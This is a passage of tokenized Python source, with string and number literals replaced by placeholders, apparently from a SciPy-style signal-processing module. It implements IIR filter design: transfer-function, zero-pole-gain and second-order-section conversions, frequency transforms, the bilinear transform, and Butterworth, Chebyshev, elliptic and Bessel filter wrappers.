<EOL> zc = np . dstack ( ( zc . conj ( ) , zc ) ) . flatten ( ) <EOL> z = np . append ( zc , zr ) <EOL> return z <EOL> def tf2zpk ( b , a ) : <EOL> r"""<STR_LIT>""" <EOL> b , a = normalize ( b , a ) <EOL> b = ( b + <NUM_LIT:0.0> ) / a [ <NUM_LIT:0> ] <EOL> a = ( a + <NUM_LIT:0.0> ) / a [ <NUM_LIT:0> ] <EOL> k = b [ <NUM_LIT:0> ] <EOL> b /= b [ <NUM_LIT:0> ] <EOL> z = roots ( b ) <EOL> p = roots ( a ) <EOL> return z , p , k <EOL> def zpk2tf ( z , p , k ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> k = atleast_1d ( k ) <EOL> if len ( z . shape ) > <NUM_LIT:1> : <EOL> temp = poly ( z [ <NUM_LIT:0> ] ) <EOL> b = zeros ( ( z . shape [ <NUM_LIT:0> ] , z . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> ) , temp . dtype . char ) <EOL> if len ( k ) == <NUM_LIT:1> : <EOL> k = [ k [ <NUM_LIT:0> ] ] * z . shape [ <NUM_LIT:0> ] <EOL> for i in range ( z . shape [ <NUM_LIT:0> ] ) : <EOL> b [ i ] = k [ i ] * poly ( z [ i ] ) <EOL> else : <EOL> b = k * poly ( z ) <EOL> a = atleast_1d ( poly ( p ) ) <EOL> if issubclass ( b . dtype . type , numpy . complexfloating ) : <EOL> roots = numpy . asarray ( z , complex ) <EOL> pos_roots = numpy . compress ( roots . imag > <NUM_LIT:0> , roots ) <EOL> neg_roots = numpy . conjugate ( numpy . compress ( roots . imag < <NUM_LIT:0> , roots ) ) <EOL> if len ( pos_roots ) == len ( neg_roots ) : <EOL> if numpy . all ( numpy . sort_complex ( neg_roots ) == <EOL> numpy . sort_complex ( pos_roots ) ) : <EOL> b = b . real . copy ( ) <EOL> if issubclass ( a . dtype . type , numpy . complexfloating ) : <EOL> roots = numpy . asarray ( p , complex ) <EOL> pos_roots = numpy . compress ( roots . imag > <NUM_LIT:0> , roots ) <EOL> neg_roots = numpy . conjugate ( numpy . compress ( roots . imag < <NUM_LIT:0> , roots ) ) <EOL> if len ( pos_roots ) == len ( neg_roots ) : <EOL> if numpy . all ( numpy . sort_complex ( neg_roots ) == <EOL> numpy . sort_complex ( pos_roots ) ) : <EOL> a = a . real . copy ( ) <EOL> return b , a <EOL> def tf2sos ( b , a , pairing = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return zpk2sos ( * tf2zpk ( b , a ) , pairing = pairing ) <EOL> def sos2tf ( sos ) : <EOL> """<STR_LIT>""" <EOL> sos = np . asarray ( sos ) <EOL> b = [ <NUM_LIT:1.> ] <EOL> a = [ <NUM_LIT:1.> ] <EOL> n_sections = sos . shape [ <NUM_LIT:0> ] <EOL> for section in range ( n_sections ) : <EOL> b = np . polymul ( b , sos [ section , : <NUM_LIT:3> ] ) <EOL> a = np . polymul ( a , sos [ section , <NUM_LIT:3> : ] ) <EOL> return b , a <EOL> def sos2zpk ( sos ) : <EOL> """<STR_LIT>""" <EOL> sos = np . asarray ( sos ) <EOL> n_sections = sos . shape [ <NUM_LIT:0> ] <EOL> z = np . empty ( n_sections * <NUM_LIT:2> , np . complex128 ) <EOL> p = np . empty ( n_sections * <NUM_LIT:2> , np . complex128 ) <EOL> k = <NUM_LIT:1.> <EOL> for section in range ( n_sections ) : <EOL> zpk = tf2zpk ( sos [ section , : <NUM_LIT:3> ] , sos [ section , <NUM_LIT:3> : ] ) <EOL> z [ <NUM_LIT:2> * section : <NUM_LIT:2> * ( section + <NUM_LIT:1> ) ] = zpk [ <NUM_LIT:0> ] <EOL> p [ <NUM_LIT:2> * section : <NUM_LIT:2> * ( section + <NUM_LIT:1> ) ] = zpk [ <NUM_LIT:1> ] <EOL> k *= zpk [ <NUM_LIT:2> ] <EOL> return z , p , k <EOL> def _nearest_real_complex_idx ( fro , to , which ) : <EOL> """<STR_LIT>""" <EOL> assert which in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> order = np . argsort ( np . abs ( fro - to ) ) <EOL> mask = np . isreal ( fro [ order ] ) <EOL> if which == '<STR_LIT>' : <EOL> mask = ~ mask <EOL> return order [ np . where ( mask ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> def zpk2sos ( z , p , k , pairing = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> valid_pairings = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> if pairing not in valid_pairings : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( valid_pairings , pairing ) ) <EOL> if len ( z ) == len ( p ) == <NUM_LIT:0> : <EOL> return array ( [ [ k , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) <EOL> p = np . concatenate ( ( p , np . zeros ( max ( len ( z ) - len ( p ) , <NUM_LIT:0> ) ) ) ) <EOL> z = np . concatenate ( ( z , np . zeros ( max ( len ( p ) - len ( z ) , <NUM_LIT:0> ) ) ) ) <EOL> n_sections = ( max ( len ( p ) , len ( z ) ) + <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> sos = zeros ( ( n_sections , <NUM_LIT:6> ) ) <EOL> if len ( p ) % <NUM_LIT:2> == <NUM_LIT:1> and pairing == '<STR_LIT>' : <EOL> p = np . concatenate ( ( p , [ <NUM_LIT:0.> ] ) ) <EOL> z = np . concatenate ( ( z , [ <NUM_LIT:0.> ] ) ) <EOL> assert len ( p ) == len ( z ) <EOL> z = np . concatenate ( _cplxreal ( z ) ) <EOL> p = np . concatenate ( _cplxreal ( p ) ) <EOL> p_sos = np . zeros ( ( n_sections , <NUM_LIT:2> ) , np . complex128 ) <EOL> z_sos = np . zeros_like ( p_sos ) <EOL> for si in range ( n_sections ) : <EOL> p1_idx = np . argmin ( np . abs ( <NUM_LIT:1> - np . abs ( p ) ) ) <EOL> p1 = p [ p1_idx ] <EOL> p = np . delete ( p , p1_idx ) <EOL> if np . isreal ( p1 ) and np . isreal ( p ) . sum ( ) == <NUM_LIT:0> : <EOL> z1_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> z1 = z [ z1_idx ] <EOL> z = np . delete ( z , z1_idx ) <EOL> p2 = z2 = <NUM_LIT:0> <EOL> else : <EOL> if not np . isreal ( p1 ) and np . isreal ( z ) . sum ( ) == <NUM_LIT:1> : <EOL> z1_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> assert not np . isreal ( z [ z1_idx ] ) <EOL> else : <EOL> z1_idx = np . argmin ( np . abs ( p1 - z ) ) <EOL> z1 = z [ z1_idx ] <EOL> z = np . delete ( z , z1_idx ) <EOL> if not np . isreal ( p1 ) : <EOL> if not np . isreal ( z1 ) : <EOL> p2 = p1 . conj ( ) <EOL> z2 = z1 . conj ( ) <EOL> else : <EOL> p2 = p1 . conj ( ) <EOL> z2_idx = _nearest_real_complex_idx ( z , p1 , '<STR_LIT>' ) <EOL> z2 = z [ z2_idx ] <EOL> assert np . isreal ( z2 ) <EOL> z = np . delete ( z , z2_idx ) <EOL> else : <EOL> if not np . isreal ( z1 ) : <EOL> z2 = z1 . conj ( ) <EOL> p2_idx = _nearest_real_complex_idx ( p , z1 , '<STR_LIT>' ) <EOL> p2 = p [ p2_idx ] <EOL> assert np . isreal ( p2 ) <EOL> else : <EOL> idx = np . where ( np . isreal ( p ) ) [ <NUM_LIT:0> ] <EOL> assert len ( idx ) > <NUM_LIT:0> <EOL> p2_idx = idx [ np . argmin ( np . abs ( np . abs ( p [ idx ] ) - <NUM_LIT:1> ) ) ] <EOL> p2 = p [ p2_idx ] <EOL> assert np . isreal ( p2 ) <EOL> z2_idx = _nearest_real_complex_idx ( z , p2 , '<STR_LIT>' ) <EOL> z2 = z [ z2_idx ] <EOL> assert np . isreal ( z2 ) <EOL> z = np . delete ( z , z2_idx ) <EOL> p = np . delete ( p , p2_idx ) <EOL> p_sos [ si ] = [ p1 , p2 ] <EOL> z_sos [ si ] = [ z1 , z2 ] <EOL> assert len ( p ) == len ( z ) == <NUM_LIT:0> <EOL> del p , z <EOL> p_sos = np . reshape ( p_sos [ : : - <NUM_LIT:1> ] , ( n_sections , <NUM_LIT:2> ) ) <EOL> z_sos = np . reshape ( z_sos [ : : - <NUM_LIT:1> ] , ( n_sections , <NUM_LIT:2> ) ) <EOL> gains = np . ones ( n_sections ) <EOL> gains [ <NUM_LIT:0> ] = k <EOL> for si in range ( n_sections ) : <EOL> x = zpk2tf ( z_sos [ si ] , p_sos [ si ] , gains [ si ] ) <EOL> sos [ si ] = np . concatenate ( x ) <EOL> return sos <EOL> def _align_nums ( nums ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> nums = asarray ( nums ) <EOL> if not np . issubdtype ( nums . dtype , np . number ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return nums <EOL> except ValueError : <EOL> nums = list ( nums ) <EOL> maxwidth = len ( max ( nums , key = lambda num : atleast_1d ( num ) . size ) ) <EOL> for index , num in enumerate ( nums ) : <EOL> num = atleast_1d ( num ) . tolist ( ) <EOL> nums [ index ] = [ <NUM_LIT:0> ] * ( maxwidth - len ( num ) ) + num <EOL> return atleast_1d ( nums ) <EOL> def normalize ( b , a ) : <EOL> """<STR_LIT>""" <EOL> b = _align_nums ( b ) <EOL> b , a = map ( atleast_1d , ( b , a ) ) <EOL> if len ( a . shape ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if len ( b . shape ) > <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( b . shape ) == <NUM_LIT:1> : <EOL> b = asarray ( [ b ] , b . dtype . char ) <EOL> while a [ <NUM_LIT:0> ] == <NUM_LIT:0.0> and len ( a ) > <NUM_LIT:1> : <EOL> a = a [ <NUM_LIT:1> : ] <EOL> outb = b * ( <NUM_LIT:1.0> ) / a [ <NUM_LIT:0> ] <EOL> outa = a * ( <NUM_LIT:1.0> ) / a [ <NUM_LIT:0> ] <EOL> if allclose ( <NUM_LIT:0> , outb [ : , <NUM_LIT:0> ] , atol = <NUM_LIT> ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" , BadCoefficients ) <EOL> while allclose ( <NUM_LIT:0> , outb [ : , <NUM_LIT:0> ] , atol = <NUM_LIT> ) and ( outb . shape [ - <NUM_LIT:1> ] > <NUM_LIT:1> ) : <EOL> outb = outb [ : , <NUM_LIT:1> : ] <EOL> if outb . shape [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> outb = outb [ <NUM_LIT:0> ] <EOL> return outb , outa <EOL> def lp2lp ( b , a , wo = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> try : <EOL> wo = float ( wo ) <EOL> except TypeError : <EOL> wo = float ( wo [ <NUM_LIT:0> ] ) <EOL> d = len ( a ) <EOL> n = len ( b ) <EOL> M = max ( ( d , n ) ) <EOL> pwo = pow ( wo , numpy . arange ( M - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> start1 = max ( ( n - d , <NUM_LIT:0> ) ) <EOL> start2 = max ( ( d - n , <NUM_LIT:0> ) ) <EOL> b = b * pwo [ start1 ] / pwo [ start2 : ] <EOL> a = a * pwo [ start1 ] / pwo [ start1 : ] <EOL> return normalize ( b , a ) <EOL> def lp2hp ( b , a , wo = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> try : <EOL> wo = float ( wo ) <EOL> except TypeError : <EOL> wo = float ( wo [ <NUM_LIT:0> ] ) <EOL> d = len ( a ) <EOL> n = len ( b ) <EOL> if wo != <NUM_LIT:1> : <EOL> pwo = pow ( wo , numpy . arange ( max ( ( d , n ) ) ) ) <EOL> else : <EOL> pwo = numpy . ones ( max ( ( d , n ) ) , b . dtype . char ) <EOL> if d >= n : <EOL> outa = a [ : : - <NUM_LIT:1> ] * pwo <EOL> outb = resize ( b , ( d , ) ) <EOL> outb [ n : ] = <NUM_LIT:0.0> <EOL> outb [ : n ] = b [ : : - <NUM_LIT:1> ] * pwo [ : n ] <EOL> else : <EOL> outb = b [ : : - <NUM_LIT:1> ] * pwo <EOL> outa = resize ( a , ( n , ) ) <EOL> outa [ d : ] = <NUM_LIT:0.0> <EOL> outa [ : d ] = a [ : : - <NUM_LIT:1> ] * pwo [ : d ] <EOL> return normalize ( outb , outa ) <EOL> def lp2bp ( b , a , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = mintypecode ( ( a , b ) ) <EOL> ma = max ( [ N , D ] ) <EOL> Np = N + ma <EOL> Dp = D + ma <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> wosq = wo * wo <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , N + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , i + <NUM_LIT:1> ) : <EOL> if ma - i + <NUM_LIT:2> * k == j : <EOL> val += comb ( i , k ) * b [ N - i ] * ( wosq ) ** ( i - k ) / bw ** i <EOL> bprime [ Np - j ] = val <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , D + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , i + <NUM_LIT:1> ) : <EOL> if ma - i + <NUM_LIT:2> * k == j : <EOL> val += comb ( i , k ) * a [ D - i ] * ( wosq ) ** ( i - k ) / bw ** i <EOL> aprime [ Dp - j ] = val <EOL> return normalize ( bprime , aprime ) <EOL> def lp2bs ( b , a , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = mintypecode ( ( a , b ) ) <EOL> M = max ( [ N , D ] ) <EOL> Np = M + M <EOL> Dp = M + M <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> wosq = wo * wo <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , N + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , M - i + <NUM_LIT:1> ) : <EOL> if i + <NUM_LIT:2> * k == j : <EOL> val += ( comb ( M - i , k ) * b [ N - i ] * <EOL> ( wosq ) ** ( M - i - k ) * bw ** i ) <EOL> bprime [ Np - j ] = val <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( <NUM_LIT:0> , D + <NUM_LIT:1> ) : <EOL> for k in range ( <NUM_LIT:0> , M - i + <NUM_LIT:1> ) : <EOL> if i + <NUM_LIT:2> * k == j : <EOL> val += ( comb ( M - i , k ) * a [ D - i ] * <EOL> ( wosq ) ** ( M - i - k ) * bw ** i ) <EOL> aprime [ Dp - j ] = val <EOL> return normalize ( bprime , aprime ) <EOL> def bilinear ( b , a , fs = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( fs ) <EOL> a , b = map ( atleast_1d , ( a , b ) ) <EOL> D = len ( a ) - <NUM_LIT:1> <EOL> N = len ( b ) - <NUM_LIT:1> <EOL> artype = float <EOL> M = max ( [ N , D ] ) <EOL> Np = M <EOL> Dp = M <EOL> bprime = numpy . zeros ( Np + <NUM_LIT:1> , artype ) <EOL> aprime = numpy . zeros ( Dp + <NUM_LIT:1> , artype ) <EOL> for j in range ( Np + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( N + <NUM_LIT:1> ) : <EOL> for k in range ( i + <NUM_LIT:1> ) : <EOL> for l in range ( M - i + <NUM_LIT:1> ) : <EOL> if k + l == j : <EOL> val += ( comb ( i , k ) * comb ( M - i , l ) * b [ N - i ] * <EOL> pow ( <NUM_LIT:2> * fs , i ) * ( - <NUM_LIT:1> ) ** k ) <EOL> bprime [ j ] = real ( val ) <EOL> for j in range ( Dp + <NUM_LIT:1> ) : <EOL> val = <NUM_LIT:0.0> <EOL> for i in range ( D + <NUM_LIT:1> ) : <EOL> for k in range ( i + <NUM_LIT:1> ) : <EOL> for l in range ( M - i + <NUM_LIT:1> ) : <EOL> if k + l == j : <EOL> val += ( comb ( i , k ) * comb ( M - i , l ) * a [ D - i ] * <EOL> pow ( <NUM_LIT:2> * fs , i ) * ( - <NUM_LIT:1> ) ** k ) <EOL> aprime [ j ] = real ( val ) <EOL> return normalize ( bprime , aprime ) <EOL> def iirdesign ( wp , ws , gpass , gstop , analog = False , ftype = '<STR_LIT>' , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ordfunc = filter_dict [ ftype ] [ <NUM_LIT:1> ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ftype ) <EOL> except IndexError : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ftype ) <EOL> wp = atleast_1d ( wp ) <EOL> ws = atleast_1d ( ws ) <EOL> band_type = <NUM_LIT:2> * ( len ( wp ) - <NUM_LIT:1> ) <EOL> band_type += <NUM_LIT:1> <EOL> if wp [ <NUM_LIT:0> ] >= ws [ <NUM_LIT:0> ] : <EOL> band_type += <NUM_LIT:1> <EOL> btype = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <EOL> <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' } [ band_type ] <EOL> N , Wn = ordfunc ( wp , ws , gpass , gstop , analog = analog ) <EOL> return iirfilter ( N , Wn , rp = gpass , rs = gstop , analog = analog , btype = btype , <EOL> ftype = ftype , output = output ) <EOL> def iirfilter ( N , Wn , rp = None , rs = None , btype = '<STR_LIT>' , analog = False , <EOL> ftype = '<STR_LIT>' , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> ftype , btype , output = [ x . lower ( ) for x in ( ftype , btype , output ) ] <EOL> Wn = asarray ( Wn ) <EOL> try : <EOL> btype = band_dict [ btype ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % btype ) <EOL> try : <EOL> typefunc = filter_dict [ ftype ] [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> raise ValueError ( "<STR_LIT>" % ftype ) <EOL> if output not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( "<STR_LIT>" % output ) <EOL> if rp is not None and rp < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if rs is not None and rs < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if typefunc == buttap : <EOL> z , p , k = typefunc ( N ) <EOL> elif typefunc == besselap : <EOL> z , p , k = typefunc ( N , norm = bessel_norms [ ftype ] ) <EOL> elif typefunc == cheb1ap : <EOL> if rp is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rp ) <EOL> elif typefunc == cheb2ap : <EOL> if rs is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rs ) <EOL> elif typefunc == ellipap : <EOL> if rs is None or rp is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> z , p , k = typefunc ( N , rp , rs ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % ftype ) <EOL> if not analog : <EOL> if numpy . any ( Wn < <NUM_LIT:0> ) or numpy . any ( Wn > <NUM_LIT:1> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> fs = <NUM_LIT> <EOL> warped = <NUM_LIT:2> * fs * tan ( pi * Wn / fs ) <EOL> else : <EOL> warped = Wn <EOL> if btype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if numpy . size ( Wn ) != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2lp ( z , p , k , wo = warped ) <EOL> elif btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2hp ( z , p , k , wo = warped ) <EOL> elif btype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> bw = warped [ <NUM_LIT:1> ] - warped [ <NUM_LIT:0> ] <EOL> wo = sqrt ( warped [ <NUM_LIT:0> ] * warped [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2bp ( z , p , k , wo = wo , bw = bw ) <EOL> elif btype == '<STR_LIT>' : <EOL> z , p , k = _zpklp2bs ( z , p , k , wo = wo , bw = bw ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" % btype ) <EOL> if not analog : <EOL> z , p , k = _zpkbilinear ( z , p , k , fs = fs ) <EOL> if output == '<STR_LIT>' : <EOL> return z , p , k <EOL> elif output == '<STR_LIT>' : <EOL> return zpk2tf ( z , p , k ) <EOL> elif output == '<STR_LIT>' : <EOL> return zpk2sos ( z , p , k ) <EOL> def _relative_degree ( z , p ) : <EOL> """<STR_LIT>""" <EOL> degree = len ( p ) - len ( z ) <EOL> if degree < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return degree <EOL> def _zpkbilinear ( z , p , k , fs ) : <EOL> """<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> degree = _relative_degree ( z , p ) <EOL> fs2 = <NUM_LIT:2> * fs <EOL> z_z = ( fs2 + z ) / ( fs2 - z ) <EOL> p_z = ( fs2 + p ) / ( fs2 - p ) <EOL> z_z = append ( z_z , - ones ( degree ) ) <EOL> k_z = k * real ( prod ( fs2 - z ) / prod ( fs2 - p ) ) <EOL> return z_z , p_z , k_z <EOL> def _zpklp2lp ( z , p , k , wo = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_lp = wo * z <EOL> p_lp = wo * p <EOL> k_lp = k * wo ** degree <EOL> return z_lp , p_lp , k_lp <EOL> def _zpklp2hp ( z , p , k , wo = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_hp = wo / z <EOL> p_hp = wo / p <EOL> z_hp = append ( z_hp , zeros ( degree ) ) <EOL> k_hp = k * real ( prod ( - z ) / prod ( - p ) ) <EOL> return z_hp , p_hp , k_hp <EOL> def _zpklp2bp ( z , p , k , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> bw = float ( bw ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_lp = z * bw / <NUM_LIT:2> <EOL> p_lp = p * bw / <NUM_LIT:2> <EOL> z_lp = z_lp . astype ( complex ) <EOL> p_lp = p_lp . astype ( complex ) <EOL> z_bp = concatenate ( ( z_lp + sqrt ( z_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> z_lp - sqrt ( z_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> p_bp = concatenate ( ( p_lp + sqrt ( p_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> p_lp - sqrt ( p_lp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> z_bp = append ( z_bp , zeros ( degree ) ) <EOL> k_bp = k * bw ** degree <EOL> return z_bp , p_bp , k_bp <EOL> def _zpklp2bs ( z , p , k , wo = <NUM_LIT:1.0> , bw = <NUM_LIT:1.0> ) : <EOL> r"""<STR_LIT>""" <EOL> z = atleast_1d ( z ) <EOL> p = atleast_1d ( p ) <EOL> wo = float ( wo ) <EOL> bw = float ( bw ) <EOL> degree = _relative_degree ( z , p ) <EOL> z_hp = ( bw / <NUM_LIT:2> ) / z <EOL> p_hp = ( bw / <NUM_LIT:2> ) / p <EOL> z_hp = z_hp . astype ( complex ) <EOL> p_hp = p_hp . astype ( complex ) <EOL> z_bs = concatenate ( ( z_hp + sqrt ( z_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> z_hp - sqrt ( z_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> p_bs = concatenate ( ( p_hp + sqrt ( p_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) , <EOL> p_hp - sqrt ( p_hp ** <NUM_LIT:2> - wo ** <NUM_LIT:2> ) ) ) <EOL> z_bs = append ( z_bs , + <NUM_LIT> * wo * ones ( degree ) ) <EOL> z_bs = append ( z_bs , - <NUM_LIT> * wo * ones ( degree ) ) <EOL> k_bs = k * real ( prod ( - z ) / prod ( - p ) ) <EOL> return z_bs , p_bs , k_bs <EOL> def butter ( N , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def cheby1 ( N , rp , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rp = rp , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def cheby2 ( N , rs , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rs = rs , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def ellip ( N , rp , rs , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , rs = rs , rp = rp , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' ) <EOL> def bessel ( N , Wn , btype = '<STR_LIT>' , analog = False , output = '<STR_LIT>' , norm = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return iirfilter ( N , Wn , btype = btype , analog = analog , <EOL> output = output , ftype = '<STR_LIT>' + norm ) <EOL> def maxflat ( ) : <EOL> pass <EOL> def yulewalk ( ) : <EOL> pass <EOL> def band_stop_obj ( wp , ind , passb , stopb , gpass , gstop , type ) : <EOL> """<STR_LIT>""" <EOL> passbC = passb . copy ( ) <EOL> passbC [ ind ] = wp <EOL> nat = ( stopb * ( passbC [ <NUM_LIT:0> ] - passbC [ <NUM_LIT:1> ] ) / <EOL> ( stopb ** <NUM_LIT:2> - passbC [ <NUM_LIT:0> ] * passbC [ <NUM_LIT:1> ] ) ) <EOL> nat = min ( abs ( nat ) ) <EOL> if type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> n = ( log10 ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) / ( <NUM_LIT:2> * log10 ( nat ) ) ) <EOL> elif type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gstop ) ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * abs ( gpass ) ) <EOL> n = arccosh ( sqrt ( ( GSTOP - <NUM_LIT:1.0> ) / ( GPASS - <NUM_LIT:1.0> ) ) ) / arccosh ( nat ) <EOL> elif type == '<STR_LIT>' : <EOL> GSTOP = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gstop ) <EOL> GPASS = <NUM_LIT:10> ** ( <NUM_LIT:0.1> * gpass ) <EOL> arg1 = sqrt ( ( GPASS - <NUM_LIT:1.0> ) / ( GSTOP - <NUM_LIT:1.0> ) ) <EOL> arg0 = <NUM_LIT:1.0> / nat <EOL> d0 = special . ellipk ( [ arg0 ** <NUM_LIT:2> , <NUM_LIT:1> - arg0 ** <NUM_LIT:2> ] ) <EOL> d1 = special . ellipk ( [ arg1 ** <NUM_LIT:2> , <NUM_LIT:1> - arg1 ** <NUM_LIT:2> ] ) <EOL> n = ( d0 [ <NUM_LIT:0> ] * d1 [ <NUM_LIT:1> ] / ( d0 [ <NUM_LIT:1> ] * d1 [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % type ) <EOL> return n <EOL> def buttord ( wp , ws , gpass , gstop 